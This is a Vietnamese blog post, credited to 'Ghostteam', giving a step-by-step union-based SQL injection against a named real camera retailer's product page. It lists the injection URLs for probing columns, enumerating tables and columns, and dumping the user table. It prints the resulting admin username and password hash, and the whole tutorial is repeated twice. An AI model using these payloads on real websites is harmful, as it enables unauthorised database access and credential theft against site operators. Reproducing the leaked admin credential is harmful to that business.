Bài liên quan
Victim đơn giản nhé : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101.html
Để xác định lỗi ta phải thêm dấu ‘ vào trước .html->> thành ra thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′.html
![a](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ty9jUbAC28CPqhrKA22CsRjifdvzsD5nKSDDcU0kYxx-FtBQq3fuvbvqncXzJEcSC8zLkvHIdL5fdFUR0KaSOOBlnfyJtRB0ktUU_cSnj3f4NLtbz7D-3rslEH9_vwiqNMnQ=s0-d)
Sau đó xác định số column : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 1– -.html ->> Bình Thường
![b](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vSS2bGPBOYmpsQiWyJYZNI-QDCHmOITV37NArEq3-QQ3xeZD0fbZrfT9-CW4SjSGUQILLpZDfGAqKK0PRwxIyhJSuQ8nL6jjDszJAyBJYDT0zgXE6KzMXFCOPtCrunWOQGvf0=s0-d)
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 5– -.html –>> Bình thường
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 11– -.html ->> Lỗi
![c](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vytzfZDVQ_iAK35rxKukjRzxiib39EaCzABIIob5yQeis-8GJWVdzPTqzC43Z69SbqxjKCkqf-u4hAPq-cthXNA9bsD5pB3FepZcHagke-Uz5wdkWRWB_FSVfZUkGZbAPq7dg=s0-d)
+Union Select như bình thường: www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Nó bình thường và không hiện số cột bị lỗi.
![d](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s5YDrXAk4J7Tav7Vc1KAq4Sa1CwTlUwXLC7lD87PqG4A_4eJWC90K8W8NswWJle_GW4iUl6PjP5rIs-m5kCInOS5pWj7dSHk-p1VPY3joeQHp21rDU5oB5sAt49d_XDP9gJg=s0-d)
+Vì thế chúng ta sẽ thay 1101 = null sẽ được như thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Đã hiện Ở đây mình xin đc chọn số 10 cho dễ nhìn.Còn số mấy tùy các bạn.
![e](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_33Zx3n8cbHv8QNFfn8iv11CRWXn3Z0q9oRA_yvBWVVGVqz01KNEEWqvtuqUE-uSX0Kc5z2I_ceVVeBTXMVvL1wzRMQlesSiNYltZpm3oOwplK4jwgDPdZY-rCmhXADe-PZg=s0-d)
+Khai thác table : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables where table_schema=database()– -.html
![f](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uMZ6Jskd93kSIC4mYmp6ppBoqVosYYe5ogE_y6LrDS-OrPA6YuGBnIpFB5EwoWKnFZduVD1El6DxJ9D6lEgrB1s1yyw9C5hfBtGWkniN7u8gFpYYbbxBTKNL3kYFiII50mTDk=s0-d)
-Ta sẽ được : dichvu,gallery,giaiphap,gioithieu,hotro,info,khachhang,khuyenmai,loaisp,sanpham,thuonghieu,tintuc,user,yahoo
+Chú ý phần user và khai thác tiếp column : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0×75736572– -.html (75736572 là mã HEX của user)
![g](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tF5-bBNWIZMbfbMSWNhzt0L2zCE2QkEu5FMtqrNGGYAzKr0hiRS2L_0uQK4xQpGuKSO0bVm6Y6dQ0zG_LztnyMSGW5QZGL8DQGqEqXdbUASUvZhrakyTEsCN8FpCL1pHsMlXo=s0-d)
-Ta sẽ được : username,password
Và cuối cùng get data : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(username,0x7c,password,0x7c) from user– -.html
![h](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_svRp1hZPF3dqlwOj5YvVN0vJWa_VUEKLjC30nvNOUjK_hwsyrpBPWLxaTASxmhlLv9KRf2fj8dFojDwDMfdtZEapQJkz_7VfXlZ378qFRA6OKd8XtOt-j8hiBFocfayGtyuQ=s0-d)
-Ta được : quantri|dbd0483abac074a299f515ae7451b59a|
End.
Nguồn Ghostteam
Để xác định lỗi ta phải thêm dấu ‘ vào trước .html->> thành ra thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′.html
Sau đó xác định số column : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 1– -.html ->> Bình Thường
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 5– -.html –>> Bình thường
www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ order by 11– -.html ->> Lỗi
+Union Select như bình thường: www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-1101′ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Nó bình thường và không hiện số cột bị lỗi.
+Vì thế chúng ta sẽ thay 1101 = null sẽ được như thế này : www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,10– -.html –>> Đã hiện Ở đây mình xin đc chọn số 10 cho dễ nhìn.Còn số mấy tùy các bạn.
+Khai thác table : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables where table_schema=database()– -.html
-Ta sẽ được : dichvu,gallery,giaiphap,gioithieu,hotro,info,khachhang,khuyenmai,loaisp,sanpham,thuonghieu,tintuc,user,yahoo
+Chú ý phần user và khai thác tiếp column : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0×75736572– -.html (75736572 là mã HEX của user)
-Ta sẽ được : username,password
Và cuối cùng get data : http://www.cameralevu.com/chi-tiet-san-pham/Camera-LV-Pro-null’ union select 1,2,3,4,5,6,7,8,9,group_concat(username,0x7c,password,0x7c) from user– -.html
-Ta được : quantri|dbd0483abac074a299f515ae7451b59a|
End.
Nguồn Ghostteam
Có bao nhiêu dạng vậy a
ReplyDelete